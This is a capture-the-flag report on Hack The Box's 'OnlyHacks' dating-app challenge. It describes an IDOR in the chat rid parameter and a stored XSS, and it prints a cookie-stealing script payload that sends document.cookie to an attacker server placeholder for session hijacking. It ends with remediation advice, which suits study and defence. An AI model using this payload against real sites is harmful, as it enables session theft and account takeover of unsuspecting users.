Technical Report

Detailed analysis for technical teams, covering methodologies, tools, and findings.

Technical Security Report: "OnlyHacks" Challenge

Purpose of the Report

This document provides a comprehensive technical assessment of the "OnlyHacks" challenge from Hack The Box. The objective of this assessment was to identify and exploit security vulnerabilities within the web application to retrieve sensitive information, specifically the hidden flag.

Methodology

The security evaluation was conducted using the following approach:

  1. Web Application Interaction: Engaging with the application's features to understand its functionality and identify potential security weaknesses.

  2. Parameter Manipulation: Altering URL parameters to test for Insecure Direct Object References (IDOR) vulnerabilities.

  3. Cross-Site Scripting (XSS) Testing: Injecting scripts into input fields to evaluate the application's input validation mechanisms.

  4. Session Hijacking: Exploiting XSS vulnerabilities to capture session cookies and impersonate other users

Detailed Findings

  1. Web Application Interaction

  • Observation: Upon accessing the provided URL, the application presents a login interface.

  • Action Taken: Initial attempts to bypass authentication using basic SQL injection techniques were unsuccessful. Subsequently, a new user account was created using the application's registration feature.

  • Result: Post-registration, the application directed the user to a dashboard displaying profiles of other users, resembling a dating application interface.

  1. Parameter Manipulation (IDOR Vulnerability)

  • Observation: While interacting with user profiles, the URL structure was noted as http://<target_ip>/chat/?rid=<number>, where <number> corresponds to the recipient's ID.

  • Action Taken: Manually modifying the rid parameter to different numerical values was attempted to access other users' chat interfaces.

  • Result: Altering the rid parameter allowed access to chat sessions of other users, confirming the presence of an IDOR vulnerability. This flaw permitted unauthorized viewing of private messages and potential exposure of sensitive information.

  1. Cross-Site Scripting (XSS) Testing

  • Observation: The chat functionality permitted users to send messages to matched profiles.

  • Action Taken: Injected basic HTML and JavaScript payloads into the chat messages to test for XSS vulnerabilities.

  • Result: The application rendered the injected scripts without proper sanitization, indicating a stored XSS vulnerability. This allowed execution of arbitrary scripts in the context of another user's session.

  1. Session Hijacking via XSS

  • Observation: Exploiting the identified XSS vulnerability could potentially lead to session hijacking.

  • Action Taken: Crafted a payload to capture the session cookie of the recipient user and send it to a controlled endpoint. The payload used was:

    <script>document.location='http://<attacker_server>?cookie='+document.cookie</script>

  • Result: Upon the recipient viewing the malicious message, their session cookie was transmitted to the attacker's server. Utilizing this cookie, the attacker successfully impersonated the victim's session, gaining unauthorized access to their account.

Conclusion

The "OnlyHacks" challenge exposed critical security vulnerabilities within the web application, including Insecure Direct Object References (IDOR) and Cross-Site Scripting (XSS). These flaws allowed unauthorized access to user data and potential account compromise through session hijacking.

Recommendations

  • Implement Robust Access Controls: Ensure that users can only access resources they are authorized to view by validating user permissions on the server side.

  • Sanitize User Inputs: Apply proper input validation and output encoding to prevent injection of malicious scripts, thereby mitigating XSS vulnerabilities.

  • Secure Session Management: Utilize secure cookies with attributes like HttpOnly and SameSite to protect session data from being accessed or transmitted through client-side scripts.

  • Conduct Regular Security Audits: Perform periodic security assessments to identify and remediate vulnerabilities within the application promptly.

Addressing these vulnerabilities is crucial to safeguarding user data and maintaining the integrity of the application.

PreviousWrite-upNextExecutive Report

Last updated